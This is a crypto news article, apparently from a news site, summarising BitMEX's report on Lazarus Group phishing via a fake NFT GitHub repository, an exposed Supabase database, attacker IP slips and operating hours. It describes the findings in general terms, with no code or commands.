View all stories
5 benefits of peanut butter
5 benefits of peanut butter
Here are 5 healthy snack ideas
Here are 5 healthy snack ideas
6 benefits of eating soaked dry fruits daily
6 benefits of eating soaked dry fruits daily
6 benefits of green tea
6 benefits of green tea
6 proven ways to keep your stomach healthy always
6 proven ways to keep your stomach healthy always
Oppo Reno 14 series to launch in India soon
Oppo Reno 14 series to launch in India soon
iPhone 17 Pro design, camera leaked online ahead of September launch
iPhone 17 Pro design, camera leaked online ahead of September launch
5 healthy foods you can add to your breakfast daily for better energy,
5 healthy foods you can add to your breakfast daily for better energy,
SEC Crypto Task Force met with the NYSE to discuss crypto regulation
SEC Crypto Task Force met with the NYSE to discuss crypto regulation
Flashnet will launch its first fully regulated Bitcoin stablecoin USDB, issued by Brale
Flashnet will launch its first fully regulated Bitcoin stablecoin USDB, issued by Brale

BitMEX Strikes Back: Exposes Lazarus Group’s Crypto Hacking Tactics

By /

BitMEX Strikes Back: Exposes Lazarus Group’s Crypto Hacking Tactics

BitMEX has published a comprehensive report on its official blog, exposing the sophisticated tactics used by North Korea’s infamous Lazarus Group in recent cyberattacks targeting the crypto exchange and its employees. Known for their high-profile crypto heists, the Lazarus Group has employed increasingly deceptive strategies, including impersonating legitimate projects to carry out phishing campaigns and inject malware.

BitMEX Strikes Back: Exposes Lazarus Group’s Crypto Hacking Tactics
source x

Phishing Attempt Triggers Counteroffensive

The exchange’s latest investigation was prompted after a BitMEX employee was contacted on LinkedIn with a proposal to join a fake NFT project. The approach was a ploy to deliver malicious code via a seemingly benign Next.js/React GitHub repository. BitMEX engineers, rather than falling for the bait, began dissecting the code and discovered it was tailored to exploit employees into running malicious scripts on their systems.

Real-Time Threat Intel Uncovered

The phishing link led BitMEX researchers to a Supabase database tied to Lazarus Group operations. This exposed valuable metadata including usernames, hostnames, operating systems, geolocation, timestamps, and IP addresses of affected devices. By analyzing patterns in the data, researchers could distinguish between test environments and actual developer systems.

One notable discovery came when a Lazarus developer inadvertently exposed their real IP address—located in Jiaxing, China—despite using a VPN. The slip, which revealed a China Mobile IP, was labeled by BitMEX as a significant operational failure that could aid in unmasking the hacker’s identity.

Organizational Structure and Hacker Hierarchy Revealed

BitMEX’s analysis went beyond identifying vulnerabilities—it offered rare insight into the internal structure of the Lazarus Group. Researchers observed that phishing operations were typically assigned to lower-tier or novice hackers, while more complex tasks, such as post-exploitation actions, were handled by more advanced members. Mistakes made by junior operatives were key to uncovering vital information.

One example involved a botched reuse of a malware tool named “BeaverTail.” Improper implementation nearly exposed another hacker’s real IP address, further suggesting a skill gap among the attackers.

Tracking Lazarus by the Clock

Researchers also mapped the attackers’ operational hours, noting that activity sharply declined between 8 a.m. and 1 p.m. UTC—corresponding to 5 p.m. to 10 p.m. Pyongyang time. The consistency of this pattern implies a regimented work schedule within the Lazarus organization.

Leveraging JavaScript Deobfuscation Tools

A key breakthrough in the investigation came from deobfuscating heavily encrypted JavaScript used in the malware. BitMEX’s team used tools like Webcrack to rename variables and analyze malicious functions. They found new components designed to log and transmit victim device data to Supabase—often left unsecured by the attackers.

By scripting automated scans of Supabase databases, BitMEX could track operational slip-ups in real time and identify vulnerabilities in the Lazarus infrastructure.

Raising the Cybersecurity Bar

BitMEX emphasized that its discoveries are not just reactive but proactive. Based on the findings, the exchange has implemented enhanced internal monitoring systems capable of detecting infections and phishing attempts as they happen. This marks a strategic pivot for BitMEX toward cybersecurity leadership in the crypto industry.

Conclusion

BitMEX’s report signals a rare counteroffensive in the ongoing battle between crypto exchanges and cybercriminals. By exposing the Lazarus Group’s methods, hierarchy, and even location data, BitMEX not only deflected a potential breach but turned the tables on one of the most sophisticated hacking collectives in the world.

Disclaimer and Risk Warning
coinweck does not endorse or is responsible for any content, accuracy, quality, advertising, products, or other materials on this page. The image used in this article is for informational purposes only and is provided to us by a third party.  coinweck should not be held responsible for image copyright issues. Contact us if you have any issues or concerns. Readers should do their research before taking any actions related to the company.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top
5 benefits of peanut butter Here are 5 healthy snack ideas 6 benefits of eating soaked dry fruits daily 6 benefits of green tea 6 proven ways to keep your stomach healthy always Oppo Reno 14 series to launch in India soon iPhone 17 Pro design, camera leaked online ahead of September launch 5 healthy foods you can add to your breakfast daily for better energy, SEC Crypto Task Force met with the NYSE to discuss crypto regulation Flashnet will launch its first fully regulated Bitcoin stablecoin USDB, issued by Brale